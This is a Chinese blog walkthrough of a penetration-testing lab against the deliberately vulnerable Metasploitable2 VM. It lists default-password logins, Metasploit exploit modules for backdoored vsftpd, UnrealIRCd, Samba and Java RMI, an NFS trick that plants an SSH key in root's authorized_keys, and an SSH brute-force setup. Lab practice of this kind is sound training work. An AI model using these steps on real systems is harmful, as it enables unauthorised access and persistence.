metasploitable2渗透测试

一、系统弱密码登录

1、在kali上执行命令行telnet 192.168.26.129

2、Login和password都输入msfadmin

3、登录成功,进入系统

4、测试如下:

 

 

二、MySQL弱密码登录:

1、在kali上执行mysql –h 192.168.26.129  –u root

2、登录成功,进入MySQL系统

3、测试效果:

 

三、PostgreSQL弱密码登录

1、在Kali上执行psql -h 192.168.26.129 –U postgres

2、输入密码:postgres

3、登录成功,进入postgresql系统

测试效果

四、VNC弱密码登录

1、在kali图形界面的终端中执行vncviewer 192.168.26.129

2、输入密码 password

3、登录成功,进入系统

测试效果:

五、Samba MS-RPC Shell 命令注入漏洞

利用步骤

 1.在kali中执行msfconsole,启动metasploit

 2.Use exploit/multi/samba/usermap_script,选择漏洞库

 3.Set RHOST 192.168.26.129 设置要攻击的机器IP

 4.Exploit,开始攻击

 5.利用成功,执行uname –a 验证

测试效果:

 

六、Vsftpd源码包后门漏洞

步骤

1、在kali中执行msfconsole,启动metasploit

2、use exploit/unix/ftp/vsftpd_234_backdoor,选择漏洞

3、set RHOST 192.168.26.129

4、利用成功,执行uname –a 验证

5、测试过程:

 

七、UnreallRCd后门漏洞

步骤

1、在kali中执行msfconsole,启动metasploit

2、use exploit/unix/irc/unreal_ircd_3281_backdoor,选择漏洞

set RHOST 192.168.26.129 ,设置要攻击的目标IP地址

3、开始攻击

4、利用成功!使用uname –a 验证

测试效果:

 

  • 八、Linux NFS共享目录配置漏洞

问题:在(2)中需要创建 /tmp/test目录并在目录下创建,如未创建则不能进行下一步

步骤

  1. 在kali上执行命令rpcinfo –p 192.168.26.129 ,查看nfs服务有无开启
  2. showmount –e 19168.26.129 查看其设置的远程目录列表
  3. 输入ssh-keygen 生成RSA公钥
  4. 依次输入:

(1)mount –t nfs 192.168.26.129://tmp/test(预先创建),把192.168.160.131的根目录挂载到/tmp/test/下;

注:如果提示下图中错误则需要/etc/init.d/rpcbind start 来启动mount

(2)cat /root/.ssh/id_rsa.pub>>/tmp/test/root/.ssh/authorized_keys,把生成的公钥追加到靶机的authorized_keys下:

(3)ssh  root@192.168.26.129,实现无密码登录

九、Java RMI SERVER 命令执行漏洞(1099/tcp)

1.Nmap –p 0-65535 192.168.26.129 来查看1099端口是否开启

2.进入msfconsole框架,依次输入以下命令:

1)use exploit/multi/misc/java_rmi_server

2)set RHOST 192.168.26.129(靶机的IP地址)

3)run

4)session

5)shell(进入meterpreter时执行)

十、Root用户弱口令漏洞(SSH爆破)

步骤

  1. 输入nmap –sV  -O(大写) 192.168.26.129 查看SSh端口是否开启
  2. 开启metasploit framework 框架,依次输入:
    1. use auxiliary/scanner/ssh/ssh_login
    2. set RHOSTS 192.168.26.129
    3. set USERNAME root
    4. set PASS_FILE  pass.txt(字典文件,需要预先生成)
    5. set THREADS 50
    6. run

我在网上找了Metasploitable2  靶机,下载了解压出来,打开直接能用

链接:https://pan.baidu.com/s/1gV75x5wV4-1TsDTIZoImXw
提取码:gx9z
 

 

  • 0
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值